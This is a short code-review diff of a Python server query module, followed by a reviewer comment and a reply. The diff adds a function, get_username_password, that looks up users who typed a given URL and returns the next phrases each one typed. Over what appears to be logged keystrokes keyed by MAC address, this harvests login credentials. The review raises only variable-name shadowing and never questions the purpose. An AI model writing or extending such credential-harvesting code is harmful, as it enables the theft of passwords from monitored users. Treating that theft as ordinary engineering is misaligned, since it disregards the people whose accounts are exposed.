src/server/query.py

```diff
@@ -8,8 +8,31 @@ def get_copied_phrases(n=100):
     pipeline = [
         {"$unwind": "$phrases"},
         {"$match": {"phrases.copy_pastaed": True}},
-        {"$group": {"_id":"$phrases.phrase", "num": {"$sum":1}, "user_ip": {"$addToSet": "$ip"}}},
+        {"$group": {"_id":"$phrases.phrase", "num": {"$sum":1}, "user_mac": {"$addToSet": "$mac"}}},
         {"$limit": int(n)},
-        {"$project": {"_id": 0, "phrase": "$_id", "user_ip": 1, "num_occurences":"$num"}}
+        {"$project": {"_id": 0, "phrase": "$_id", "user_mac": 1, "num_occurences":"$num"}}
     ]
     return database.db.users.aggregate(pipeline)
+
+
+def get_username_password(url, num=2):
+    pipeline = [
+        {"$unwind": "$phrases"},
+        {"$match":{"phrases.phrase":url}},
+        {"$project":{"mac":"$mac", "timestamp":"$phrases.start_timestamp"}},
+    ]
+    results = database.db.users.aggregate(pipeline)
+    results_list = []
+    for result in results:
+        mac = result['mac']
+        timestamp = result['timestamp']
+        pipeline = [
+            {"$unwind": "$phrases"},
+            {"$match": {"mac":mac, "phrases.start_timestamp": {"$gt":timestamp}}},
+            {"$limit": int(num)},
+            {"$project": {"_id":0, "user_mac": "$mac", "phrase": "$phrases.phrase"}}
+        ]
+        results = database.db.users.aggregate(pipeline)
```

Comment:
Isn't this dangerous? You're overriding the variable names declared earlier `results` and `result`? I'm surprised this work as intended.

Do you mind changing these names jus so it's less confusing?

Reply:
Yep, changed.